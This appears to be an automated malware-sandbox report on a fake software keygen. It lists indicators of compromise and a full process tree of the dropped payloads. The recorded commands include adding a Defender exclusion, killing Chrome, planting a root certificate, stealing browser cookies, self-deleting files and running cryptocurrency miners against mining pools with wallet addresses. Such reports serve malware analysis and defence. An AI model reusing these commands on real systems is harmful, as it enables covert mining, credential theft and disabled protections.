description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 5828 PING.EXE 2748 PING.EXE 296 PING.EXE 2552 PING.EXE -
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 538 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 540 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 546 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 550 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 100 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 105 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1252 setups.tmp 1252 setups.tmp 1260 key.exe 1260 key.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe 4784 multitimer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3004 Setup.exe Token: SeCreateTokenPrivilege 900 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 900 askinstall20.exe Token: SeLockMemoryPrivilege 900 askinstall20.exe Token: SeIncreaseQuotaPrivilege 900 askinstall20.exe Token: SeMachineAccountPrivilege 900 askinstall20.exe Token: SeTcbPrivilege 900 askinstall20.exe Token: SeSecurityPrivilege 900 askinstall20.exe Token: SeTakeOwnershipPrivilege 900 askinstall20.exe Token: SeLoadDriverPrivilege 900 askinstall20.exe Token: SeSystemProfilePrivilege 900 askinstall20.exe Token: SeSystemtimePrivilege 900 askinstall20.exe Token: SeProfSingleProcessPrivilege 900 askinstall20.exe Token: SeIncBasePriorityPrivilege 900 askinstall20.exe Token: SeCreatePagefilePrivilege 900 askinstall20.exe Token: SeCreatePermanentPrivilege 900 askinstall20.exe Token: SeBackupPrivilege 900 askinstall20.exe Token: SeRestorePrivilege 900 askinstall20.exe Token: SeShutdownPrivilege 900 askinstall20.exe Token: SeDebugPrivilege 900 askinstall20.exe Token: SeAuditPrivilege 900 askinstall20.exe Token: SeSystemEnvironmentPrivilege 900 askinstall20.exe Token: SeChangeNotifyPrivilege 900 askinstall20.exe Token: SeRemoteShutdownPrivilege 900 askinstall20.exe Token: SeUndockPrivilege 900 askinstall20.exe Token: SeSyncAgentPrivilege 900 askinstall20.exe Token: SeEnableDelegationPrivilege 900 askinstall20.exe Token: SeManageVolumePrivilege 900 askinstall20.exe Token: SeImpersonatePrivilege 900 askinstall20.exe Token: SeCreateGlobalPrivilege 900 askinstall20.exe Token: 31 900 askinstall20.exe Token: 32 900 askinstall20.exe Token: 33 900 askinstall20.exe Token: 34 900 askinstall20.exe Token: 35 900 askinstall20.exe Token: SeDebugPrivilege 2940 taskkill.exe Token: SeDebugPrivilege 1656 multitimer.exe Token: SeDebugPrivilege 4256 MicrosoftEdge.exe Token: SeDebugPrivilege 4256 MicrosoftEdge.exe Token: SeDebugPrivilege 4256 MicrosoftEdge.exe Token: SeDebugPrivilege 4256 MicrosoftEdge.exe Token: SeImpersonatePrivilege 1260 key.exe Token: SeTcbPrivilege 1260 key.exe Token: SeChangeNotifyPrivilege 1260 key.exe Token: SeCreateTokenPrivilege 1260 key.exe Token: SeBackupPrivilege 1260 key.exe Token: SeRestorePrivilege 1260 key.exe Token: SeIncreaseQuotaPrivilege 1260 key.exe Token: SeAssignPrimaryTokenPrivilege 1260 key.exe Token: SeImpersonatePrivilege 1260 key.exe Token: SeTcbPrivilege 1260 key.exe Token: SeChangeNotifyPrivilege 1260 key.exe Token: SeCreateTokenPrivilege 1260 key.exe Token: SeBackupPrivilege 1260 key.exe Token: SeRestorePrivilege 1260 key.exe Token: SeIncreaseQuotaPrivilege 1260 key.exe Token: SeAssignPrimaryTokenPrivilege 1260 key.exe Token: SeImpersonatePrivilege 1260 key.exe Token: SeTcbPrivilege 1260 key.exe Token: SeChangeNotifyPrivilege 1260 key.exe Token: SeCreateTokenPrivilege 1260 key.exe Token: SeBackupPrivilege 1260 key.exe Token: SeRestorePrivilege 1260 key.exe Token: SeIncreaseQuotaPrivilege 1260 key.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1004 setups.exe 1252 setups.tmp 4256 MicrosoftEdge.exe 5024 MicrosoftEdgeCP.exe 5024 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1152 wrote to memory of 3772 1152 Ciberlink.power.dvd.8.delux.keygen.exe 79 PID 1152 wrote to memory of 3772 1152 Ciberlink.power.dvd.8.delux.keygen.exe 79 PID 1152 wrote to memory of 3772 1152 Ciberlink.power.dvd.8.delux.keygen.exe 79 PID 3772 wrote to memory of 2192 3772 cmd.exe 82 PID 3772 wrote to memory of 2192 3772 cmd.exe 82 PID 3772 wrote to memory of 2192 3772 cmd.exe 82 PID 3772 wrote to memory of 4092 3772 cmd.exe 83 PID 3772 wrote to memory of 4092 3772 cmd.exe 83 PID 3772 wrote to memory of 4092 3772 cmd.exe 83 PID 3772 wrote to memory of 2208 3772 cmd.exe 84 PID 3772 wrote to memory of 2208 3772 cmd.exe 84 PID 3772 wrote to memory of 2208 3772 cmd.exe 84 PID 3772 wrote to memory of 3432 3772 cmd.exe 85 PID 3772 wrote to memory of 3432 3772 cmd.exe 85 PID 3772 wrote to memory of 3432 3772 cmd.exe 85 PID 2192 wrote to memory of 1260 2192 keygen-pr.exe 87 PID 2192 wrote to memory of 1260 2192 keygen-pr.exe 87 PID 2192 wrote to memory of 1260 2192 keygen-pr.exe 87 PID 3432 wrote to memory of 3004 3432 keygen-step-4.exe 86 PID 3432 wrote to memory of 3004 3432 keygen-step-4.exe 86 PID 2208 wrote to memory of 804 2208 keygen-step-3.exe 88 PID 2208 wrote to memory of 804 2208 keygen-step-3.exe 88 PID 2208 wrote to memory of 804 2208 keygen-step-3.exe 88 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 1260 wrote to memory of 808 1260 key.exe 89 PID 804 wrote to memory of 296 804 cmd.exe 92 PID 804 wrote to memory of 296 804 cmd.exe 92 PID 804 wrote to memory of 296 804 cmd.exe 92 PID 3004 wrote to memory of 1656 3004 Setup.exe 93 PID 3004 wrote to memory of 1656 3004 Setup.exe 93 PID 3004 wrote to memory of 1004 3004 Setup.exe 94 PID 3004 wrote to memory of 1004 3004 Setup.exe 94 PID 3004 wrote to memory of 1004 3004 Setup.exe 94 PID 1004 wrote to memory of 1252 1004 setups.exe 97 PID 1004 wrote to memory of 1252 1004 setups.exe 97 PID 1004 wrote to memory of 1252 1004 setups.exe 97 PID 3432 wrote to memory of 900 3432 keygen-step-4.exe 96 PID 3432 wrote to memory of 900 3432 keygen-step-4.exe 96 PID 3432 wrote to memory of 900 3432 keygen-step-4.exe 96 PID 900 wrote to memory of 508 900 askinstall20.exe 98 PID 900 wrote to memory of 508 900 askinstall20.exe 98 PID 900 wrote to memory of 508 900 askinstall20.exe 98 PID 508 wrote to memory of 2940 508 cmd.exe 100 PID 508 wrote to memory of 2940 508 cmd.exe 100 PID 508 wrote to memory of 2940 508 cmd.exe 100 PID 3432 wrote to memory of 4412 3432 keygen-step-4.exe 105 PID 3432 wrote to memory of 4412 3432 keygen-step-4.exe 105 PID 3432 wrote to memory of 4412 3432 keygen-step-4.exe 105 PID 1656 wrote to memory of 4636 1656 multitimer.exe 108 PID 1656 wrote to memory of 4636 1656 multitimer.exe 108 PID 4636 wrote to memory of 4784 4636 multitimer.exe 109
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ciberlink.power.dvd.8.delux.keygen.exe"C:\Users\Admin\AppData\Local\Temp\Ciberlink.power.dvd.8.delux.keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:808
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:4092
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:296
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\45BA75ZGKR\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\45BA75ZGKR\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Users\Admin\AppData\Local\Temp\45BA75ZGKR\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\45BA75ZGKR\multitimer.exe" 1 3.1616622034.605bb1d22c01a 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Users\Admin\AppData\Local\Temp\45BA75ZGKR\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\45BA75ZGKR\multitimer.exe" 2 3.1616622034.605bb1d22c01a7⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\be4c4cghopz\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\be4c4cghopz\AwesomePoolU1.exe"8⤵PID:3988
-
-
C:\Users\Admin\AppData\Local\Temp\cfp1raavmlf\5dzqe0dgf1e.exe"C:\Users\Admin\AppData\Local\Temp\cfp1raavmlf\5dzqe0dgf1e.exe" /VERYSILENT8⤵PID:4568
-
C:\Users\Admin\AppData\Local\Temp\is-OQSDJ.tmp\5dzqe0dgf1e.tmp"C:\Users\Admin\AppData\Local\Temp\is-OQSDJ.tmp\5dzqe0dgf1e.tmp" /SL5="$501D2,2592217,780800,C:\Users\Admin\AppData\Local\Temp\cfp1raavmlf\5dzqe0dgf1e.exe" /VERYSILENT9⤵PID:4752
-
C:\Users\Admin\AppData\Local\Temp\is-VG0GF.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-VG0GF.tmp\winlthsth.exe"10⤵PID:4376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 49611⤵
- Program crash
PID:200
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ukexn4na2xb\vpn.exe"C:\Users\Admin\AppData\Local\Temp\ukexn4na2xb\vpn.exe" /silent /subid=4828⤵PID:4696
-
C:\Users\Admin\AppData\Local\Temp\is-44MHB.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-44MHB.tmp\vpn.tmp" /SL5="$202C6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ukexn4na2xb\vpn.exe" /silent /subid=4829⤵PID:4296
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:2152
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:5944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:6456
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:7084
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:8948
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:8804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\czlox43mlna\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\czlox43mlna\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:4828
-
-
C:\Users\Admin\AppData\Local\Temp\1dzcrhq2g3l\vict.exe"C:\Users\Admin\AppData\Local\Temp\1dzcrhq2g3l\vict.exe" /VERYSILENT /id=5358⤵PID:4336
-
-
C:\Users\Admin\AppData\Local\Temp\cd0uvwurjen\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\cd0uvwurjen\Setup3310.exe" /Verysilent /subid=5778⤵PID:4344
-
-
C:\Users\Admin\AppData\Local\Temp\a1tqyl0dfwr\app.exe"C:\Users\Admin\AppData\Local\Temp\a1tqyl0dfwr\app.exe" /8-238⤵PID:4836
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Icy-Sun"9⤵PID:2372
-
-
C:\Program Files (x86)\Icy-Sun\7za.exe"C:\Program Files (x86)\Icy-Sun\7za.exe" e -p154.61.71.13 winamp-plugins.7z9⤵PID:5028
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Icy-Sun\app.exe" -map "C:\Program Files (x86)\Icy-Sun\WinmonProcessMonitor.sys""9⤵PID:6672
-
C:\Program Files (x86)\Icy-Sun\app.exe"C:\Program Files (x86)\Icy-Sun\app.exe" -map "C:\Program Files (x86)\Icy-Sun\WinmonProcessMonitor.sys"10⤵PID:6708
-
-
-
C:\Program Files (x86)\Icy-Sun\7za.exe"C:\Program Files (x86)\Icy-Sun\7za.exe" e -p154.61.71.13 winamp.7z9⤵PID:5056
-
-
C:\Program Files (x86)\Icy-Sun\app.exe"C:\Program Files (x86)\Icy-Sun\app.exe" /8-239⤵PID:7252
-
-
-
C:\Users\Admin\AppData\Local\Temp\rhwq0i3sov5\0mojfomlx00.exe"C:\Users\Admin\AppData\Local\Temp\rhwq0i3sov5\0mojfomlx00.exe" /quiet SILENT=1 AF=7568⤵PID:4852
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\rhwq0i3sov5\0mojfomlx00.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\rhwq0i3sov5\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616366102 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5844
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B8K79K2DK7\setups.exe"C:\Users\Admin\AppData\Local\Temp\B8K79K2DK7\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Users\Admin\AppData\Local\Temp\is-V5QU0.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-V5QU0.tmp\setups.tmp" /SL5="$5004A,250374,58368,C:\Users\Admin\AppData\Local\Temp\B8K79K2DK7\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1252
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:508 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4412
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:3736
-
C:\Users\Admin\AppData\Roaming\10D9.tmp.exe"C:\Users\Admin\AppData\Roaming\10D9.tmp.exe"5⤵PID:2744
-
C:\Users\Admin\AppData\Roaming\10D9.tmp.exe"C:\Users\Admin\AppData\Roaming\10D9.tmp.exe"6⤵PID:5008
-
-
-
C:\Users\Admin\AppData\Roaming\20C8.tmp.exe"C:\Users\Admin\AppData\Roaming\20C8.tmp.exe"5⤵PID:944
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\20C8.tmp.exe"6⤵PID:6124
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK7⤵
- Delays execution with timeout.exe
PID:4680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3fbb85ac..exe"C:\Users\Admin\AppData\Local\Temp\3fbb85ac..exe"5⤵PID:2512
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5588
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:6360
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:5872
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:2552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵PID:5968
-
C:\ProgramData\8966476.exe"C:\ProgramData\8966476.exe"5⤵PID:4228
-
-
C:\ProgramData\4454125.exe"C:\ProgramData\4454125.exe"5⤵PID:5096
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵PID:5284
-
-
-
C:\ProgramData\599427.exe"C:\ProgramData\599427.exe"5⤵PID:5636
-
C:\ProgramData\599427.exe"{path}"6⤵PID:4452
-
-
-
C:\ProgramData\5552864.exe"C:\ProgramData\5552864.exe"5⤵PID:5040
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:4732
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6796
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6048
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4256
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4300
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5024
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4420
-
C:\Users\Admin\AppData\Local\Temp\is-O12SA.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-O12SA.tmp\vict.tmp" /SL5="$9002E,870426,780800,C:\Users\Admin\AppData\Local\Temp\1dzcrhq2g3l\vict.exe" /VERYSILENT /id=5351⤵PID:1336
-
C:\Users\Admin\AppData\Local\Temp\is-SECKS.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-SECKS.tmp\winhost.exe" 5352⤵PID:4624
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\LldVzhqqk.dll"3⤵PID:4380
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\LldVzhqqk.dll"4⤵PID:5684
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\LldVzhqqk.dll"5⤵PID:5764
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\LldVzhqqk.dllVHsPH6KBq.dll"3⤵PID:1344
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\LldVzhqqk.dllVHsPH6KBq.dll"4⤵PID:6464
-
-
-
